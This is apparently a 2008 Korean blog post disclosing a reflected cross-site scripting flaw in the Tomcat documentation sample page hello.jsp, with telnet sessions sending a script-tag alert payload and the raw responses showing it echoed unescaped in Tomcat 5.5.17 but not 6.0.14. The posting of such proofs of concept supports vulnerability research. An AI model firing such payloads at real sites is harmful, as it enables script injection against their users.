2008년 02월 04일

Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities

Tomcat 5.5.17

$ telnet localhost 80

Trying 61.60.95.194...

Connected to localhost.

Escape character is '^]'.

GET /tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script> HTTP/1.0

 

HTTP/1.1 200 OK

Set-Cookie: JSESSIONID=0B6AB3D531BEF2877302A2D251EACFAA; Path=/tomcat-docs

Content-Type: text/html

Content-Length: 963

Date: Mon, 04 Feb 2008 14:15:13 GMT

Server: Apache-Coyote/1.1

Connection: close

 

<html>

<head>

<title>Sample Application JSP Page</title>

</head>

<body bgcolor=white>

 

<table border="0">

<tr>

<td align=center>

<img src="images/tomcat.gif">

</td>

<td>

<h1>Sample Application JSP Page</h1>

This is the output of a JSP page that is part of the Hello, World

application.  It displays several useful values from the request

we are currently processing.

</td>

</tr>

</table>

 

<table border="0" border="100%">

<tr>

  <th align="right">Context Path:</th>

  <td align="left">/tomcat-docs</td>

</tr>

<tr>

  <th align="right">Path Information:</th>

  <td align="left">null</td>

</tr>

<tr>

  <th align="right">Query String:</th>

  <td align="left">test=<script>alert(document.domain)</script></td>

</tr>

<tr>

  <th align="right">Request Method:</th>

  <td align="left">GET</td>

</tr>

<tr>

  <th align="right">Servlet Path:</th>

  <td align="left">/appdev/sample/web/hello.jsp</td>

</tr>

</table>

</body>

</html>

Connection closed by foreign host.

 

$

 

 

Tomcat 6.0.14

$ telnet 10.97.167.68 8080

Trying 10.97.167.68...

Connected to 10.97.167.68.

Escape character is '^]'.

GET /docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script> HTTP/1.0

 

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Set-Cookie: JSESSIONID=517C2CF178444473DAB74F68793D26EB; Path=/docs

Content-Type: text/html

Content-Length: 355

Date: Sun, 03 Feb 2008 15:40:14 GMT

Connection: close

 

<html>

<head>

<title>Sample Application JSP Page</title>

</head>

<body bgcolor=white>

 

<table border="0">

<tr>

<td align=center>

<img src="images/tomcat.gif">

</td>

<td>

<h1>Sample Application JSP Page</h1>

This is the output of a JSP page that is part of the Hello, World

application.

</td>

</tr>

</table>

 

Hello!

 

</body>

</html>

Connection closed by foreign host.

 

$

 

参照URL

http://www.securityfocus.com/bid/24058/

by Jang | 2008/02/04 23:40 | Vulnerability | 트랙백

트랙백 주소 : http://misman95.egloos.com/tb/1734988
☞ 내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

◀ 이전 페이지          다음 페이지 ▶